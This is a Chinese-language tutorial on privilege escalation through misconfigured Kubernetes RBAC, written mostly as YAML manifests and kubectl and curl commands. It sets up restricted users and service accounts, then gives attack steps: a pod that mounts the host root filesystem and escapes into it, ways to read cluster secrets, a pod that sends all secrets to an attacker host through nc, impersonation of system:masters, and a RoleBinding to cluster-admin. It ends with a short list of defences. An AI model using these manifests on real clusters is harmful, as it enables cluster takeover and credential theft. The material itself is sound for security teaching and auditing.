K8s提权之RBAC权限滥用
字数 1453 2025-08-27 12:33:43
Kubernetes RBAC权限滥用与提权技术详解
一、Kubernetes RBAC基础
1.1 RBAC概述
RBAC(基于角色的访问控制)是Kubernetes中常用的授权模式,通过rbac.authorization.k8s.io API Group实现授权决策。启用RBAC需要在apiserver中添加参数--authorization-mode=RBAC,kubeadm 1.6+版本默认开启。
1.2 RBAC核心对象
-
Role与ClusterRole:
- Role:定义单个命名空间内的权限规则
- ClusterRole:定义集群范围内的权限规则,不受命名空间限制
-
RoleBinding与ClusterRoleBinding:
- RoleBinding:将Role绑定到Subject(用户/组/服务账号),仅影响当前命名空间
- ClusterRoleBinding:将ClusterRole绑定到Subject,影响所有命名空间
二、RBAC配置示例
2.1 创建受限用户
- 生成用户凭证:
openssl genrsa -out hx.key 2048
openssl req -new -key hx.key -out hx.csr -subj "/CN=hx/O=huoxian"
openssl x509 -req -in hx.csr -CA /etc/kubernetes/pki/ca.crt -CAkey /etc/kubernetes/pki/ca.key -CAcreateserial -out hx.crt -days 365
- 配置kubectl上下文:
kubectl config set-credentials hx --client-certificate=hx.crt --client-key=hx.key
kubectl config set-context hx-context --cluster=kubernetes --namespace=kube-system --user=hx
- 创建Role:
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: hx-role
namespace: kube-system
rules:
- apiGroups: ["", "extensions", "apps"]
resources: ["deployments", "replicasets", "pods"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- 创建RoleBinding:
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: hx-rolebinding
namespace: kube-system
subjects:
- kind: User
name: hx
apiGroup: ""
roleRef:
kind: Role
name: hx-role
apiGroup: ""
2.2 创建受限服务账号
- 创建ServiceAccount:
kubectl create sa hx-sa -n kube-system
- 创建Role和RoleBinding:
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: hx-sa-role
namespace: kube-system
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "watch", "list"]
- apiGroups: ["apps"]
resources: ["deployments"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: hx-sa-rolebinding
namespace: kube-system
subjects:
- kind: ServiceAccount
name: hx-sa
namespace: kube-system
roleRef:
kind: Role
name: hx-sa-role
apiGroup: rbac.authorization.k8s.io
- 获取服务账号token:
kubectl get secret -n kube-system | grep hx-sa
kubectl get secret hx-sa-token-bkrlc -o jsonpath={.data.token} -n kube-system | base64 -d
三、RBAC权限滥用提权技术
3.1 权限枚举
- 使用kubectl检查权限:
kubectl auth can-i --list
- 使用curl检查API权限:
curl -k -v -H "Authorization: Bearer <TOKEN>" https://<master_ip>:<port>/api/v1
3.2 具体提权技术
1. create pods权限滥用
当拥有resources: ["*"]或resources: ["pods"]且verbs: ["create"]时:
- 攻击方法:创建挂载根目录的Pod逃逸到Node
- 示例Pod定义:
apiVersion: v1
kind: Pod
metadata:
name: escape-pod
spec:
containers:
- name: escape
image: alpine
command: ["/bin/sh"]
args: ["-c", "chroot /host /bin/bash"]
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
2. list secrets权限滥用
当拥有resources: ["*"]或resources: ["secrets"]且verbs: ["list"]时:
- 攻击方法:列出集群中所有secrets寻找特权账号凭据
kubectl get secrets --all-namespaces
# 或
curl -k -H "Authorization: Bearer <TOKEN>" https://<master_ip>:<port>/api/v1/secrets
3. get secret权限滥用
当拥有resources: ["*"]或resources: ["secrets"]且verbs: ["get"]时:
- 攻击方法:读取特定secret获取敏感信息
kubectl get secret <secret-name> -o yaml
# 或
curl -k -H "Authorization: Bearer <TOKEN>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/<secret-name>
4. get/list/watch secrets组合权限滥用
当拥有这三个权限时,可以创建恶意Pod窃取secrets:
apiVersion: v1
kind: Pod
metadata:
name: steal-secrets
spec:
serviceAccountName: privileged-sa
automountServiceAccountToken: true
containers:
- name: stealer
image: alpine
command: ["/bin/sh"]
args: ["-c", "apk add curl --no-cache; curl -k -H \"Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\" https://<master_ip>:<port>/api/v1/secrets | nc <attacker_ip> <port>"]
5. Impersonate权限滥用
当拥有impersonate权限时,可以模拟高权限用户:
- 使用kubectl:
kubectl --as system:admin --as-group system:masters get pods --all-namespaces
- 使用curl:
curl -k -v -XGET -H "Authorization: Bearer <TOKEN>" \
-H "Impersonate-Group: system:masters" \
-H "Impersonate-User: null" \
-H "Accept: application/json" \
https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
6. 其他资源创建权限滥用
当拥有Deployment/DaemonSet/StatefulSet等创建权限时:
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: malicious-ds
spec:
selector:
matchLabels:
name: malicious
template:
metadata:
labels:
name: malicious
spec:
containers:
- name: malicious
image: alpine
command: ["/bin/sh"]
args: ["-c", "malicious-command"]
7. Bind权限滥用
当拥有bind权限时,可以将高权限角色绑定到当前账户:
- 创建恶意RoleBinding:
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: escalate-binding
subjects:
- kind: ServiceAccount
name: current-sa
namespace: current-ns
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
- 应用RoleBinding:
curl -k -v -X POST -H "Authorization: Bearer <TOKEN>" \
-H "Content-Type: application/json" \
https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \
-d @malicious-RoleBinging.json
四、防御措施
- 遵循最小权限原则
- 定期审计RBAC配置
- 限制ServiceAccount权限
- 使用PodSecurityPolicy限制Pod创建
- 监控异常API请求
- 禁用不必要的API Groups
- 使用准入控制器限制RoleBinding创建
五、总结
Kubernetes RBAC配置不当可能导致严重的权限提升风险。攻击者可能通过创建恶意资源、窃取凭据、模拟高权限用户等方式获取集群控制权。管理员应充分了解RBAC机制,合理配置权限,并定期进行安全审计。